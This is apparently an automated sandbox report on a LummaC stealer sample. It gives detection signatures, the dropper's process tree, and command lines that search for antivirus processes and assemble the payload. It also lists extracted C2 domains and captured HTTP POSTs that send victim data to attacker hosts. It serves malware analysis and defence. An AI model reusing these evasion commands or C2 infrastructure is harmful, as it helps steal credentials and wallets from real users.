Edit tour

Windows Analysis Report
TNyOrM6mIM.exe

Overview

General Information

Sample name:	TNyOrM6mIM.exe renamed because original name is a hash value
Original sample name:	ec19fa1027fee164803cc127aef64199.exe
Analysis ID:	1581619
MD5:	ec19fa1027fee164803cc127aef64199
SHA1:	8a1c7cd16c432a67eb9d71fe745d5ce5e4315dfd
SHA256:	bb6ed22605e38edeea643fc3ef43ced73ba96cc3740f8e1d4332932a36d45a41
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Leaks process information

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

TNyOrM6mIM.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\TNyOrM6mIM.exe" MD5: EC19FA1027FEE164803CC127AEF64199)

PasoCattle.exe (PID: 6572 cmdline: "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" MD5: A3E9A86D6EDE94C3C71D1F7EEA537766)

cmd.exe (PID: 6804 cmdline: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5844 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5692 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 604 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2900 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 848 cmdline: cmd /c md 768400 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7004 cmdline: extrac32 /Y /E Reflect MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 5632 cmdline: findstr /V "cocks" Articles MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6828 cmdline: cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Climb.com (PID: 6996 cmdline: Climb.com V MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 5680 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

Set-up.exe (PID: 6744 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "spuriotis.click", "inherineau.buzz", "scentniej.buzz"], "Build id": "5FwhVM--lll"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: Climb.com PID: 6996	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Climb.com PID: 6996	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Climb.com PID: 6996	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Climb.com PID: 6996	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.TNyOrM6mIM.exe.850000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x78d71d:$s1: Runner 0x78d882:$s3: RunOnStartup 0x78d731:$a1: Antis 0x78d75e:$a2: antiVM 0x78d765:$a3: antiSandbox 0x78d771:$a4: antiDebug 0x78d77b:$a5: antiEmulator 0x78d788:$a6: enablePersistence 0x78d79a:$a7: enableFakeError 0x78d8ab:$a8: DetectVirtualMachine 0x78d8d0:$a9: DetectSandboxie 0x78d8fb:$a10: DetectDebugger 0x78d90a:$a11: CheckEmulator

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6804, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2900, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:56:59.566499+0100	2028371	3	Unknown Traffic	192.168.2.12	49718	104.21.2.51	443	TCP
2024-12-28T09:57:01.657556+0100	2028371	3	Unknown Traffic	192.168.2.12	49721	104.21.2.51	443	TCP
2024-12-28T09:57:04.092642+0100	2028371	3	Unknown Traffic	192.168.2.12	49722	104.21.2.51	443	TCP
2024-12-28T09:57:06.345220+0100	2028371	3	Unknown Traffic	192.168.2.12	49723	104.21.2.51	443	TCP
2024-12-28T09:57:08.729694+0100	2028371	3	Unknown Traffic	192.168.2.12	49724	104.21.2.51	443	TCP
2024-12-28T09:57:11.179091+0100	2028371	3	Unknown Traffic	192.168.2.12	49725	104.21.2.51	443	TCP
2024-12-28T09:57:13.643766+0100	2028371	3	Unknown Traffic	192.168.2.12	49726	104.21.2.51	443	TCP
2024-12-28T09:57:17.397219+0100	2028371	3	Unknown Traffic	192.168.2.12	49728	104.21.2.51	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:57:00.389426+0100	2054653	1	A Network Trojan was detected	192.168.2.12	49718	104.21.2.51	443	TCP
2024-12-28T09:57:02.458749+0100	2054653	1	A Network Trojan was detected	192.168.2.12	49721	104.21.2.51	443	TCP
2024-12-28T09:57:18.198459+0100	2054653	1	A Network Trojan was detected	192.168.2.12	49728	104.21.2.51	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:57:00.389426+0100	2049836	1	A Network Trojan was detected	192.168.2.12	49718	104.21.2.51	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:57:02.458749+0100	2049812	1	A Network Trojan was detected	192.168.2.12	49721	104.21.2.51	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:57:12.023579+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.12	49725	104.21.2.51	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: TNyOrM6mIM.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0798	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003ff::3	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "spuriotis.click", "inherineau.buzz", "scentniej.buzz"], "Build id": "5FwhVM--lll"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

ReversingLabs: Detection: 69%

Multi AV Scanner detection for submitted file

Source: TNyOrM6mIM.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.0% probability

Machine Learning detection for sample

Source: TNyOrM6mIM.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: spuriotis.click
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 5FwhVM--lll

Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_5f503452-6

Source: TNyOrM6mIM.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.12:49728 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406301 FindFirstFileW,FindClose,	2_2_00406301
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ACDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_00ACDC54
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ADA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_00ADA087
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ADA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_00ADA1E2
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ACE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	14_2_00ACE472
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ADA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	14_2_00ADA570
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AD66DC FindFirstFileW,FindNextFileW,FindClose,	14_2_00AD66DC
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A9C622 FindFirstFileExW,	14_2_00A9C622
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AD73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	14_2_00AD73D4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AD7333 FindFirstFileW,FindClose,	14_2_00AD7333
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ACD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_00ACD921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.12:49718 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49718 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49728 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.12:49725 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.12:49721 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49721 -> 104.21.2.51:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: spuriotis.click
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 502157Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 31 36 35 38 39 39 30 39 36 36 37 39 38 36 37 35 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 34 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View

IP Address: 3.218.7.103 3.218.7.103

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49718 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49721 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49725 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49722 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49726 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49728 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49724 -> 104.21.2.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49723 -> 104.21.2.51:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W4VT9U8C13User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12787Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7H5VWCKKRPBASPSMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15058Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C4T4PAUKBR25MPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20221Host: spuriotis.click
